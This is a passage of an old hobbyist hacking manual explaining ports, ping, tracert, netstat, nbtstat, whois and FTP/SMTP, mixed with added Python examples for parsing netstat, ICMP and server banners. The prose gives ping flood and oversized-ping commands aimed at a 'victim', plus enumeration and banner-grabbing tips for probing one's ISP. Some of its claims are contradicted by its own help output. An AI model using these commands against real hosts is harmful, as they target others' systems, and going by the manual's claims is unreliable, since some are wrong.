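  UDP    ankit-s-hax-box:nbdatagram *:*
  TCP    ankit-s-hax-box:12345  0.0.0.0:0              LISTENING
"""

# Well-known names, from the text's port list plus names netstat itself prints.
PORT_NAMES = {7: "echo", 11: "systat", 13: "time", 15: "netstat", 22: "ssh", 23: "telnet",
              25: "smtp", 43: "whois", 79: "finger", 80: "http", 110: "pop3", 119: "nntp",
              137: "nbname", 138: "nbdatagram", 139: "nbsession", 513: "rlogin"}
NAME_PORTS = {name: port for port, name in PORT_NAMES.items()}

# Default ports of the trojans named in the text; a listener there needs a look.
TROJAN_PORTS = {("TCP", 12345): "NetBus default port", ("UDP", 31337): "Back Orifice default port"}


def split_endpoint(endpoint: str) -> Tuple[str, int]:
    """'host:pop3' -> ('host', 110); '*:*' -> ('*', 0); unknown names -> -1."""
    host, _, port = endpoint.rpartition(":")
    if port.isdigit():
        return host, int(port)
    return host, 0 if port == "*" else NAME_PORTS.get(port, -1)


def parse_netstat(text: str) -> List[Dict[str, object]]:
    """One record per connection line; header and blank lines are skipped."""
    records = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 3 or fields[0] not in ("TCP", "UDP"):
            continue
        _, lport = split_endpoint(fields[1])
        rhost, rport = split_endpoint(fields[2])
        state = fields[3] if len(fields) > 3 else ""    # UDP lines carry no state
        records.append({"proto": fields[0], "local_port": lport, "remote_host": rhost,
                        "remote_port": rport, "state": state})
    return records


def listening_ports(records) -> List[Tuple[str, int, str]]:
    """(proto, port, service name) for every listening TCP socket and every UDP socket."""
    out = set()
    for r in records:
        if r["state"] == "LISTENING" or (r["proto"] == "UDP" and r["remote_host"] == "*"):
            out.add((r["proto"], r["local_port"], PORT_NAMES.get(r["local_port"], "?")))
    return sorted(out)


def established(records) -> List[Tuple[str, int]]:
    """Remote (host, port) of each ESTABLISHED connection: who am I talking to."""
    return [(r["remote_host"], r["remote_port"]) for r in records if r["state"] == "ESTABLISHED"]


def suspicious_listeners(records) -> List[str]:
    """Listening sockets on the trojan default ports named in the text."""
    return [f"{proto} {port}: {TROJAN_PORTS[(proto, port)]}"
            for proto, port, _ in listening_ports(records) if (proto, port) in TROJAN_PORTS]


if __name__ == "__main__":
    recs = parse_netstat(SAMPLE_NETSTAT)
    print("listening:", listening_ports(recs))
    print("established:", established(recs))
    print("check these:", suspicious_listeners(recs))
```

On the manual's own listing the only established connection is the POP3 session to the mail server, the NetBIOS ports 137 to 139 are listening as usual on a Win9x box, and the constructed 12345 line is the one the last function singles out.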

 

Sockets and Ports Explained

Note: I am assuming that you have at least some knowledge about TCP/IP.

What is all the hype about socket programming? What exactly are sockets?

TCP/IP or Transmission Control Protocol/Internet Protocol is the language or the protocol used by computers to communicate with each other over the Internet. Say a computer whose IP address is 99.99.99.99 wants to communicate with another machine whose IP address is 98.98.98.98; then what will happen? The machine whose IP is 99.99.99.99 sends a packet addressed to the machine whose IP is 98.98.98.98. When 98.98.98.98 receives the packet it verifies that it got the message by sending a signal back to 99.99.99.99. But say the person who is using 99.99.99.99 wants to have more than one connection to 98.98.98.98 simultaneously; then what will happen? Say 99.99.99.99 wants to connect to the FTP daemon and download a file by FTP, and at the same time it wants to connect to 98.98.98.98's website, i.e. connect to the HTTP daemon. Then 98.98.98.98 will have 2 connections with 99.99.99.99 simultaneously. Now how can 98.98.98.98 distinguish between the two connections? How does 98.98.98.98 know which is for the FTP daemon and which for the HTTP daemon? If there was no way to distinguish between the two connections then they would both get mixed up and there would be a lot of chaos, with the message meant for the HTTP daemon going to the FTP daemon. To avoid such confusion we have ports. At each port a particular service or daemon is running by default. So now that the 99.99.99.99 computer knows which port to connect to in order to download a file by FTP and which port to connect to in order to download the web page, it will communicate with the 98.98.98.98 machine using what is known as the socket pair, which is a combination of an IP address and a port. So in the above case the message which is meant for the FTP daemon will be addressed to 98.98.98.98:21 (notice the colon and the default FTP port following it).

So the receiving machine, i.e. 98.98.98.98, will know which service this message is meant for and to which port it should be directed. In TCP/IP, or over the Internet, all communication is done using the socket pair, i.e. the combination of the IP address and the port.
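The socket-pair idea above, shown live on the loopback interface as an added example (not code from the manual): a small server accepts two connections from the same client at the same time and echoes back the peer address it saw for each. Both connections share the server's (IP, port) and differ only in the client's port, and that difference is what lets the server keep them apart. Everything here is local and constructed; no remote host is contacted and the "FTP-like" and "HTTP-like" requests are just labels.

```python
# Added example (not part of the manual): the socket-pair idea above, shown
# live on the loopback interface. A small server accepts two connections from
# the same client at the same time and echoes back the peer address it saw for
# each one. The two connections share the server's (IP, port) but differ in the
# client's port, and that is exactly what lets the server keep them apart.
# Everything here is local and constructed; no remote host is contacted.

import socket
import threading
from typing import Dict, List, Tuple


def _serve_one(conn: socket.socket, peer: Tuple[str, int]) -> None:
    """Reply with the socket pair the server sees for this connection."""
    with conn:
        request = conn.recv(1024)
        conn.sendall(f"{peer[0]}:{peer[1]} asked for ".encode() + request)


def start_server(expected: int) -> Tuple[socket.socket, threading.Thread]:
    """Listen on 127.0.0.1 on an OS-chosen port and handle `expected` connections."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop() -> None:
        for _ in range(expected):
            conn, peer = srv.accept()
            threading.Thread(target=_serve_one, args=(conn, peer), daemon=True).start()

    thread = threading.Thread(target=accept_loop, daemon=True)
    thread.start()
    return srv, thread


def demo_socket_pairs() -> Dict[str, object]:
    """Open two simultaneous connections to one service and report both pairs."""
    requests = [b"RETR file.txt", b"GET /index.html"]   # 'FTP-like' and 'HTTP-like'
    srv, thread = start_server(len(requests))
    server_addr = srv.getsockname()
    clients: List[socket.socket] = []
    for _ in requests:                                  # both connect before either sends
        clients.append(socket.create_connection(server_addr, timeout=5))
    pairs, replies = [], []
    for c, req in zip(clients, requests):
        c.sendall(req)
        replies.append(c.recv(1024).decode())
        pairs.append((c.getsockname(), c.getpeername()))   # (local, remote) socket pair
        c.close()
    thread.join(timeout=5)
    srv.close()
    return {
        "server": server_addr,
        "pairs": pairs,
        "replies": replies,
        # the server's view of each connection matches the client's own local port
        "consistent": all(r.startswith(f"{p[0][0]}:{p[0][1]} ") for p, r in zip(pairs, replies)),
    }


if __name__ == "__main__":
    result = demo_socket_pairs()
    for pair, reply in zip(result["pairs"], result["replies"]):
        print(pair, "->", reply)
```

The printed pairs have identical remote halves and different local halves; that is the four-tuple (source IP, source port, destination IP, destination port) the TCP stack uses to route each arriving segment to the right connection.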

DOS hacking utilities shipping with Windows, and Linux utilities too.

Most hacker friendly utilities that ship with Windoze are hidden and a normal user will not be able to find them. All of them are either in the c:\windows directory or on the Windows installation CD.

PING

Now let's start with what exactly Ping is. Ping is a part of the ICMP protocol, i.e. the Internet Control Message Protocol. ICMP is a protocol used to troubleshoot TCP/IP networks. Ping is a command which sends out a datagram to the specified host. This specified host, if alive, i.e. turned on, sends out a reply or echoes back the same datagram. If the datagram that reaches back to your computer is the same datagram that was sent, then it means that the host is alive. So Ping is basically a command which allows you to check if a host is alive or not. It can also be used to calculate the amount of time taken for a datagram to reach the host. It is so deadly that it can be used to ping a hostname perpetually, which may even cause the host to crash. Now what happens is that when a host receives a Ping signal, it allocates some of its resources to attend to or to echo back the datagram. Now if you Ping a host perpetually, then a time will come when all the resources of the host are used up and the host either hangs or restarts. Due to Ping's deadly nature, most shell account ISPs hide the Ping utility. To find it issue the following command:

whereis ping

It is usually hidden in /usr/etc.

Ping has many parameters, and a list of parameters can be found by reading the man pages, or if you are running Windows you can get help by simply typing ping at the DOS prompt.
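The datagram Ping sends and the check it makes on what comes back, as an added example (not code from the manual or from any ping implementation): it builds an ICMP Echo Request with the standard one's-complement checksum and verifies an Echo Reply the way the text describes, same identifier, same sequence number and the same datagram payload. The reply is simulated locally so it runs offline; actually sending one needs a raw socket and administrator rights, which is left out. The 32-byte payload is constructed here.

```python
# Added example (not part of the manual): the packet Ping sends and the check
# it makes on what comes back. It builds an ICMP Echo Request (type 8) with the
# RFC 1071 one's-complement checksum, and verifies an Echo Reply (type 0) the
# way the text describes: same identifier, same sequence number and the same
# datagram payload. The reply is simulated locally so this runs offline;
# actually sending one needs a raw socket and administrator rights.

import struct
from typing import Dict

# 32-byte payload, constructed; Windows ping sends an alphabet pattern of this kind.
DEFAULT_PAYLOAD = b"abcdefghijklmnopqrstuvwabcdefghi"


def icmp_checksum(data: bytes) -> int:
    """RFC 1071: one's-complement sum of 16-bit words, then complemented."""
    if len(data) % 2:
        data += b"\x00"                                   # pad odd length
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:                                   # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(ident: int, seq: int, payload: bytes = DEFAULT_PAYLOAD) -> bytes:
    """Type 8, code 0, checksum over the whole message with the field zeroed first."""
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    checksum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, checksum, ident, seq) + payload


def check_echo_reply(packet: bytes, ident: int, seq: int,
                     payload: bytes = DEFAULT_PAYLOAD) -> Dict[str, object]:
    """Decide whether `packet` is the reply to our request; says why if not."""
    if len(packet) < 8:
        return {"alive": False, "reason": "too short for an ICMP header"}
    if icmp_checksum(packet) != 0:                       # a valid message sums to zero
        return {"alive": False, "reason": "checksum mismatch (corrupted in transit)"}
    icmp_type, code, _, r_ident, r_seq = struct.unpack("!BBHHH", packet[:8])
    if icmp_type != 0 or code != 0:
        return {"alive": False, "reason": f"not an echo reply (type {icmp_type}, code {code})"}
    if (r_ident, r_seq) != (ident, seq):
        return {"alive": False, "reason": "reply belongs to a different request"}
    if packet[8:] != payload:
        return {"alive": False, "reason": "echoed datagram differs from the one sent"}
    return {"alive": True, "reason": "echo reply matches the request"}


def simulate_reply(request: bytes) -> bytes:
    """Constructed stand-in for the host: same message with type 0 and a fresh checksum."""
    _, code, _, ident, seq = struct.unpack("!BBHHH", request[:8])
    header = struct.pack("!BBHHH", 0, code, 0, ident, seq)
    checksum = icmp_checksum(header + request[8:])
    return struct.pack("!BBHHH", 0, code, checksum, ident, seq) + request[8:]


if __name__ == "__main__":
    req = build_echo_request(ident=0x1234, seq=1)
    print(check_echo_reply(simulate_reply(req), 0x1234, 1))
    damaged = bytearray(simulate_reply(req))
    damaged[20] ^= 0xFF                                   # flip bits in the payload
    print(check_echo_reply(bytes(damaged), 0x1234, 1))
```

The identifier and sequence number are what let a ping program match replies to its own requests when several are in flight, and the checksum check is why a damaged reply is reported as a loss rather than as a live host.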

The flood ping which pings a host perpetually is:

ping -f hostname

ping -a hostname can be used to resolve addresses to hostnames.

When I typed ping at the DOS prompt I got the following help:

C:\WINDOWS>ping

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
            [-r count] [-s count] [[-j host-list] | [-k host-list]]
            [-w timeout] destination-list

Options:
    -t             Ping the specified host until stopped.
                   To see statistics and continue - type Control-Break;
                   To stop - type Control-C.
    -a             Resolve addresses to hostnames.
    -n count       Number of echo requests to send.
    -l size        Send buffer size.
    -f             Set Don't Fragment flag in packet.
    -i TTL         Time To Live.
    -v TOS         Type Of Service.
    -r count       Record route for count hops.
    -s count       Timestamp for count hops.
    -j host-list   Loose source route along host-list.
    -k host-list   Strict source route along host-list.
    -w timeout     Timeout in milliseconds to wait for each reply.

You can even Ping yourself. Earlier I told you guys that the IP 127.0.0.1 is the localhost; this means that when you connect to 127.0.0.1 you actually connect to your own machine.

So to ping yourself perpetually, issue the following command:

ping -f 127.0.0.1

Well, actually the flood ping no longer works on most OSs as they have been updated.

The following Ping command creates a giant datagram of size 65510 for Ping. It might hang the victim's computer.

C:\windows>ping -l 65510

Tracert

When you type hotmail.com in your browser, your request passes through a large number of computers before reaching hotmail.com. Or when you log in to your shell account and type the password, this password passes through a large number of computers before reaching the shell account server.

To find out the list of servers your password or request passes through, you can use the tracert command. In Unix you can use the traceroute command. Again, I got help by simply typing tracert at the DOS prompt.

C:\WINDOWS>tracert

Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name

Options:
    -d                 Do not resolve addresses to hostnames.
    -h maximum_hops    Maximum number of hops to search for target.
    -j host-list       Loose source route along host-list.
    -w timeout         Wait timeout milliseconds for each reply.

Let's take an example of tracing the path taken by a datagram to reach hotmail.com from your machine. To do this simply type the following command:

C:\windows>tracert hotmail.com

Instead of hotmail.com you can also write the IP address of hotmail.com, which you can get by doing an nslookup. Try tracert with different parameters and see what the result is. That is the best way to learn how this command works.

Netstat

This is by far the most interesting hacking tool, which gives some important information about your ISP. Netstat doesn't display any help information unless you type netstat /?. I got the following info:

C:\WINDOWS>netstat /?

Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

  -a            Displays all connections and listening ports.
  -e            Displays Ethernet statistics. This may be combined with the -s option.
  -n            Displays addresses and port numbers in numerical form.
  -p proto      Shows connections for the protocol specified by proto; proto may be TCP or UDP. If used with the -s option to display per-protocol statistics, proto may be TCP, UDP, or IP.
  -r            Displays the routing table.
  -s            Displays per-protocol statistics. By default, statistics are shown for TCP, UDP and IP; the -p option may be used to specify a subset of the default.
  interval      Redisplays selected statistics, pausing interval seconds between each display. Press CTRL+C to stop redisplaying statistics. If omitted, netstat will print the current configuration information once.

The -a parameter can be used to list the open ports on your computer and your IP address. I have explained it in the IP address section.

For example,

C:\windows>netstat -a

Will display the Kernal Routing Information, ports open on your machine, your IP, the IP of the host you are connected to and also the port of the host to which you are connected to.

If you are logged into your shell account and give the netstat command then it may give the IP addresses of all people who are logged into that server at that moment. All these IPs are dynamic, of course.
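Here is an added example of what you can do with that output (it is an illustration written for this edition, not a tool from the original manual). It parses a constructed sample of netstat -an output, lists which ports the machine is actually accepting connections on, and which remote hosts it is talking to. Run it on your own box and anything listening that you did not expect is the first thing to look into. The sample addresses are documentation addresses, not real hosts.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample of Windows "netstat -an" output for this example
# (documentation addresses from RFC 5737; not captured from a real machine).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    203.0.113.45:1031      198.51.100.7:25        ESTABLISHED
  TCP    203.0.113.45:1032      198.51.100.9:80        TIME_WAIT
  UDP    0.0.0.0:137            *:*
"""


class Socket(NamedTuple):
    proto: str
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: Optional[int]   # None for the "*:*" shown on UDP sockets
    state: str                   # "" when netstat prints no state (UDP)


# One socket line: proto, local addr:port, foreign addr:port, optional state.
LINE_RE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+?):(\d+)\s+(\S+?):(\d+|\*)(?:\s+(\S+))?\s*$"
)


def parse_netstat(text: str) -> List[Socket]:
    """Parse "netstat -an" style output into Socket records; header lines are skipped."""
    sockets = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                     # "Active Connections", column header, blanks
        proto, lip, lport, rip, rport, state = m.groups()
        sockets.append(Socket(
            proto, lip, int(lport), rip,
            None if rport == "*" else int(rport),
            state or "",
        ))
    return sockets


def listening_ports(sockets: List[Socket]) -> List[Tuple[str, int]]:
    """Ports that accept traffic: TCP sockets in LISTENING state plus every bound UDP port."""
    open_ports = {
        (s.proto, s.local_port)
        for s in sockets
        if s.state == "LISTENING" or s.proto == "UDP"
    }
    return sorted(open_ports)


def remote_peers(sockets: List[Socket]) -> List[Tuple[str, int]]:
    """Hosts and ports this machine currently has ESTABLISHED TCP sessions with."""
    return sorted(
        (s.remote_ip, s.remote_port)
        for s in sockets
        if s.proto == "TCP" and s.state == "ESTABLISHED" and s.remote_port is not None
    )


if __name__ == "__main__":
    socks = parse_netstat(SAMPLE_NETSTAT)
    print("listening:", listening_ports(socks))
    print("connected to:", remote_peers(socks))
```

Feed it the real thing with something like `netstat -an > ports.txt` and `parse_netstat(open("ports.txt").read())`; the `-n` keeps addresses numeric so the regex does not have to cope with resolved names.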

Another interesting command is the nbtstat command, which too is a great tool to get valuable info on a host you are connected to. For more info type nbtstat at the prompt.

C:\windows>nbtstat -A <host>

The above-mentioned command will allow the hacker to obtain a list of usernames, system names, and domains. I will mention more about this command in the Hacking Truths Manual on File Sharing.

Arp and Route are really advanced commands which I do not think should be mentioned in a newbies manual. But all of you who want more info on any of these commands can either try simply typing the name of the command or the command name followed by /?

Eg

Command /?

Will display help on the command.

**********************

Hacking Tip: ARP (Address Resolution Protocol) is used to translate IP Addresses to Ethernet addresses. The translation is done only for outgoing IP packets, because this is when the IP header and the Ethernet header are created. An ARP table entry looks like this:

IP address          Ethernet address
1.                  08-00-39-00-2F-C3

Route is used to display info on the routing tables.

**********************

WHOIS: Getting Info about a Domain

How do you get a .com registration? Well, you register with Network Solutions, give them some money and you have your own domain name, i.e. your very own .com registration. Now all people who register with Network Solutions have to fill in a form in which they have to enter information like Name, Contact Information, Email Address, IP address and much more. All this data is stored in a database maintained by Network Solutions. You can perform a query which is known as a Whois query and gather information on a particular domain or host. Say you want to find out the IP or the name of the person who owns the www.hotmail.com domain, what do you do?

Well, either you could go to the Network Solutions site or internic.net and enter hotmail.com in the input box, or you can directly enter the following in the location bar of your browser and make a whois enquiry.

Enter the following in the location bar of your browser:

http://205.177.25.9/cgi-bin/whois?hotmail.com

Note: Replace hotmail.com with the domain name on which you want to perform a WHOIS query.

Manual Port Surfing

You have obtained the list of open ports by using some canned hacking tool. Now what do you do? Connect to each port of the remote server, i.e. your ISP. Earlier I taught you a lame method of telnetting to a remote server. Now let's get to a cool method of connecting to a remote computer. You are not a Hacker if you do not telnet like this:

C:\windows> telnet hostname.com ###

Well this command is pretty much self explanatory. Telnet calls the telnet program, Hostname is the hostname or the IP of the remote server and ### is the open port of the remote server you want to connect to.

It is not necessary that, as port 25 is normally the SMTP port, each and every server would be running SMTP at port 25. It all varies from server to server. If you learn port surfing then you can connect to the FTP (21) daemon and download or upload files, connect to the SMTP daemon and send mail, even forged mail, POP (110) to receive mail and HTTP (80) to download web pages.

OK, get ready to explore the most common ports which are likely to be open on your ISP's servers. Port 23 is the default port to which Telnet connects if the port number is not given. Generally when we are connected to Port 23 of the remote server we are greeted by a Welcome Banner and then we are given the Login Prompt. Connecting to Port 23 also generally gives the name of the OS running at the remote server, which is invaluable in finding exploits, as a particular exploit may work only if the remote computer is running the same combination of service and Operating System.

Basically connecting to Port 23 gives us the OS of the remote computer. WIN 95/98/NT don't ship with telnet servers, so unless a telnet server is installed Port 23 would not be open. So if Port 23 of your ISP is not open then it should be safe to think that the server is not running Win 95/98/NT. But you can never be sure; just maybe your ISP has installed a telnet server and is running Windows.

Nowadays almost none of the ISPs keep Port 23 open as the number of Hackers has really increased. Now let's move on to Port 21 or the FTP Port. Do you use Cute FTP or some other FTP client? Ever wondered how it works?

FTP or Port 21 Explained

First of all FTP stands for File Transfer Protocol. To read geek stuff on the FTP protocol read RFC 114 and RFC 959.

FTP or File Transfer Protocol is a Protocol used to transfer files from a server to a client. Now a server would be the computer you are connected to and the client would be you yourself.

To connect to an FTP server we need to have FTP software known as the FTP client. FTP is basically a protocol popular for transferring files from the server to the client or vice versa. So we can say that FTP servers will allow you to download and also upload files.

LIST OF FTP SERVERS

Unix FTPD

Win9x WFTPD, Microsoft Frontpage

Win NT IIS

Mac FTPD

Well it is really a simple process of FTP'ing to your favourite site. In fact Windows itself ships with an FTP client which is quite lame and I do not at all recommend it, but still what the heck. How FTP works is actually quite self explanatory. The FTP client, i.e. the program that you run at your computer, first contacts the FTP daemon (the service running at Port 21) on the server specified. If the server has an FTP daemon running then you might get a welcome screen which is also known as the Daemon Banner. A daemon banner is something that displays a welcome message and/or info on the OS or service running on the host you have FTP'ed to. A daemon banner gives us valuable info on the host we connect to.

Just remember that if we want to get root or break into an FTP server then we need to search for a hole we can exploit, and to search for a hole which we can exploit we need to know the OS, the OS version and also the version of the FTP server running on the host. This means that say there is an FTP server which has 2 versions, one that runs on Windows and the other that runs on Unix. If the Unix version has a hole, then it is not necessary that the Windows version too would have the same hole. A hole exists due to the combination of the server software and the OS running at the host. This means that even if the FTP server is the same but the OS is different, the hole would not work. So before you start to look for holes in the FTP server running at your ISP, just note down the OS version and the FTP server version running at your ISP.

The daemon banner is followed by the password prompt, something like the following:

Connected to web2.mtnl.net.in.

220-

220-#*************************************************************

220-# Welcome to MTNL's ftp site

220-#*************************************************************

220-#

220-# You can upload your own homepages at this site!!!

220-#

220-# Just login with your username and upload the HTML pages.

220-# (You can use your favourite HTML editor as well)

220-#

220-# World will see it at http://web2.mtnl.net.in/~yourusername/

220-#

220-# So get going......UNLEASH YOUR CREATIVITY !!!!

220-#

220-#*************************************************************

220-

220 ftp2.mtnl.net.in FTP server ready.

User (web2.mtnl.net.in:(none)): ankit

331 Password required for ankit.

Password:
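As an added example (not part of the original manual), the following Python parses replies in the format both FTP and SMTP servers use (RFC 959 and RFC 821): a three-digit code, then either a hyphen for a continuation line or a space for the last line of the reply. It is fed the greeting shown above and the Sendmail greeting quoted later in the SMTP section, both typed in here as constructed samples, and reports what each banner gives away about the host. From the administrator's side this is the check to run against your own servers: if the greeting names the software and version, that is exactly the information the text above says a hacker wants first, and most daemons let you trim it. The wu-ftpd style "(Version ...)" banner pattern is an assumption about a common format, not something taken from this page.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample replies for this example. The FTP greeting is modelled on
# the MTNL banner shown above and the SMTP greeting on the Sendmail banner
# quoted later in this manual; neither was captured from a live server here.
FTP_GREETING = (
    "220-\r\n"
    "220-#*************************************************************\r\n"
    "220-# Welcome to MTNL's ftp site\r\n"
    "220-#*************************************************************\r\n"
    "220 ftp2.mtnl.net.in FTP server ready.\r\n"
)
SMTP_GREETING = (
    "220 delhi1.mtnl.net.in ESMTP Sendmail 8.9.1 (1.1.20.3/26Oct99-0620AM) "
    "Fri, 7 Apr 2000 19:57:05 +0530 (IST)\r\n"
)

# "NNN-text" is a continuation line, "NNN text" the final line of a reply.
REPLY_LINE_RE = re.compile(r"^(\d{3})([ -])(.*)$")


def parse_reply(text: str) -> Tuple[int, List[str]]:
    """Parse one FTP/SMTP reply (RFC 959 / RFC 821 format) into (code, text lines).

    A multi-line reply opens with "NNN-" and ends at the first line that starts
    with "NNN " (same code, then a space). Intermediate lines usually repeat the
    code, but RFC 959 permits bare text there, so such lines are kept verbatim.
    """
    code: Optional[int] = None
    lines: List[str] = []
    for raw in text.splitlines():
        m = REPLY_LINE_RE.match(raw)
        if m is None:
            if code is None:
                raise ValueError(f"reply does not start with a 3-digit code: {raw!r}")
            lines.append(raw)
            continue
        line_code, sep, rest = int(m.group(1)), m.group(2), m.group(3)
        if code is None:
            code = line_code
        elif line_code != code:
            raise ValueError(f"code changed from {code} to {line_code} mid-reply")
        lines.append(rest)
        if sep == " ":
            return code, lines          # terminating line reached
    raise ValueError("reply has no terminating 'NNN ' line")


def reply_class(code: int) -> str:
    """Meaning of the first digit, shared by FTP and SMTP reply codes."""
    return {
        1: "positive preliminary",
        2: "positive completion",
        3: "positive intermediate",
        4: "transient negative",
        5: "permanent negative",
    }.get(code // 100, "unknown")


# Greeting shapes seen in the banners on this page. The FTP pattern also accepts
# the wu-ftpd style "host FTP server (Version ...) ready." (assumed format).
BANNER_PATTERNS = [
    re.compile(r"^(?P<host>\S+) FTP server (?:\((?P<software>[^)]*)\) )?ready", re.I),
    re.compile(r"^(?P<host>\S+) E?SMTP (?P<software>Sendmail \S+)", re.I),
]


def advertised_software(greeting: str) -> Optional[Tuple[str, Optional[str]]]:
    """Return (host, software) a 220 greeting gives away; software is None if it names none."""
    code, lines = parse_reply(greeting)
    if code != 220:
        return None
    for pattern in BANNER_PATTERNS:
        m = pattern.match(lines[-1])
        if m:
            return m.group("host"), m.group("software")
    return None


if __name__ == "__main__":
    for greeting in (FTP_GREETING, SMTP_GREETING):
        code, lines = parse_reply(greeting)
        print(code, reply_class(code), advertised_software(greeting))
```

Note that the MTNL FTP greeting above gives only the hostname, while the Sendmail greeting hands out the exact version; the same parser is all you need to read the 331 (positive intermediate, "send the password") and 530 (permanent negative) replies that follow a login attempt.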

Now most FTP daemons are badly configured; well, actually I should say the system administrators allow Guest or anonymous logins. What I mean by that is the FTP daemon allows you to enter Guest or Anonymous as the username. If you login through the Guest account, then it asks you for your email address, so that it can add to the server logs that you visited that site and used the FTP daemon.

Here instead of your true email address, you can make one up in your mind, just remember to put the @ sign in between and of course no spaces.

So How Do I use the Windows FTP Client?

Well first of all I think the FTP client which ships with Windows is not a GUI application. I personally do not like it and think you should either use your favourite FTP client or use the Telnet application that ships with Windows to connect to Port 21.

Anyway for those of who are die hard Microsoft fans or want to learn each and every thing in Windows, I will explain how this FTP Client is used. Actually this FTP program is quite powerful and it makes Hacking cool. If you use a GUI FTP program for hacking to impress your friends then they would probably say that anyone can use a GUI. This Windows FTP program may seem formidable to some at first sight.

Now first of all go to MS DOS to run this program as it runs in DOS. Now type

FTP

to launch it.

C:\WINDOWS>ftp

Your prompt will change to

ftp>

This is the FTP prompt and signifies that the FTP Client has been launched and is running.

Now to transfer files or to do some FTP hacking you need to know the FTP commands. To get a list of FTP commands type help at the FTP prompt.

ftp> help

Commands may be abbreviated. Commands are:

! delete literal prompt send

? debug ls put status

append dir mdelete pwd trace

ascii disconnect mdir quit type

bell get mget quote user

binary glob mkdir recv verbose

bye hash mls remotehelp

cd help mput rename

close lcd open rmdir

ftp>

You may get something like the above on your screen. Instead of typing help you could also type ?; that too would give the same result. Now to get help on individual commands type the following:

ftp>help [command]

Say for example I want to learn how to use the cd command and what it does; then I type the following:

ftp>help cd

The FTP program will return this:

cd Change remote working directory

Note: Instead of the above I could also have typed: ftp>? cd

Different FTP Commands:

Now the Get command is used to get files from the server you are connected to.

ftp>get file.txt

This will get or download the text file named file.txt. To download multiple files one cannot use the get command; the mget or multiple get command is used instead (the m in mget stands for multiple). For example the following gets all text files from the host:

ftp>mget *.txt

Say you want to upload a single file then you use the put command and to upload multiple files use the mput command.

Say you are working in the Windows directory and want to change to the c:\windows\temp directory while you are in the process of uploading files. To change the local directory, use the lcd command.

For example,

ftp>lcd temp

This will make temp the current local working directory.

The bye or close commands are basically terminating commands. The ! command allows you to escape to the shell at any moment.

Another interesting command is the SYST command, which gives us information on the server's OS and the FTP server's version etc. This is excellent to get info on the host's OS version and FTP daemon's version, so that you can search for it on the net.

For a single line description of each command use the help or the ? command followed by the command you want info on.

Now that you know some of the basic FTP commands let me take you through the process of uploading your site to your ISP's server. I am assuming that your ISP's hostname is isp.net and all the files that have to be uploaded to the ISP's server are in the directory c:\Site

First let's start by connecting or FTP'ing to your ISP. There are 2 ways to start an FTP session. The first way is to pass an argument along with the ftp command, i.e. you can directly connect to a host by typing ftp followed by the hostname. The second method involves first launching the FTP client and then using the open command to connect to the host. For more info on the open command type help open

For Example,

C:\windows>ftp isp.net

Or

C:\windows>ftp

ftp>open isp.net

In most cases after you have connected to the host, i.e. your ISP, you will see the welcome banner of your ISP and then it will ask for a username and a password. Enter them. If you do not have them then try the Anonymous or the Guest login, or read on to learn to hack into an FTP server. Anyway, getting back to the uploading of the website. Remember that the files you want to upload are in the c:\site directory but the current local working directory is Windows (it is normally the default directory in which MS DOS opens). So before starting to upload files you need to change the local working directory from c:\windows to c:\site. To do this use the lcd command.

For Example,

ftp>lcd c:\site

Now you are set to upload the files. I am assuming that all files in the directory need to be uploaded; if that is not the case then use the wildcard " * " symbol and make the necessary selections.

ftp>mput *.*

Voila, you have just uploaded your own website by using a command line FTP program; you have finally learnt to do without the GUI clients. You may say that all this stuff is stupid and you do not give a damn about uploading your site and want to learn how to break into FTP servers and steal passwords....well if you are reading this manual then I am sure you have no knowledge about how to hide your identity while connecting to an FTP server. You see, whenever you connect to an FTP server, any server for that matter, your IP is recorded in the server log, and when the system administrator finds that someone is downloading the passwords file, then I am pretty much sure that he would not be too pleased and you will find that the feds are fighting with the SS outside your house as to who gets to arrest you. It is illegal to download a password file which is not available to the normal public. Now don't get the wrong idea that I am against hacking or something, but what I want you guys to understand is that I do not want you guys to get caught, and like I said before, if you are reading this manual then you do not know how to edit the server logs and how to hide your identity, how to erase all your tracks from the victim's server and how to create a backdoor to the server so that you can access it whenever you want.

Common FTP Hacks

There are various FTP servers with various versions. No FTP server is fully clean of bugs. There are so many bugs that even if I write a line on each it would become too loooooooong. But you can search for FTP bugs by finding out the FTP version number and the OS running at the host and searching for the hole at the following sites:

http://astalavista.box.sk

http://cert.org

http://www.securityforce.com

http://packetstorm.genocide.com

http://www.antionline.com

http://www.rootshell.com

http://www.insecure.org

http://www.ntbugtraq.com

http://support.microsoft.com (Get Security Bulletins and Fixes to common holes on Windows systems)

http://www.crosswinds.net/~hackingtruths

Some common FTP bugs would be the FTP bounce attack and local FTP bugs (read the following manual: http://www.crosswinds.net/~hackingtruths/ftpindex.txt).

There is also a DoS (Denial of Service, not MS DOS) attack which can be used to crash Win NT servers and also an OOB (Out of Band) attack. (Read all about it at: http://blacksun.box.sk/ftp.txt )

SMTP [Port 25] & POP [Port 110]

Most of you would be using email clients like MS Outlook, Netscape Messenger, Eudora or even Opera to send and receive mail. Have you ever wondered what exactly your favourite email client does? I will just give you an overview of what actually happens.

Now when you compose a mail and click on Send, your email client locates the mail server that you specified during configuration or setup. Once the mail server is located, your email client by default connects to port 25 (SMTP or the Simple Mail Transfer Protocol) to send mail. At Port 25 a daemon is running which listens for connections. Your email client connects to this daemon and sends the mail. Most mail servers have Sendmail, which is also known as the buggiest daemon on earth, installed on the SMTP port. Qmail is another popular SMTP daemon, running on most Web-based email services' mail servers (e.g. Hotmail is running qmail).
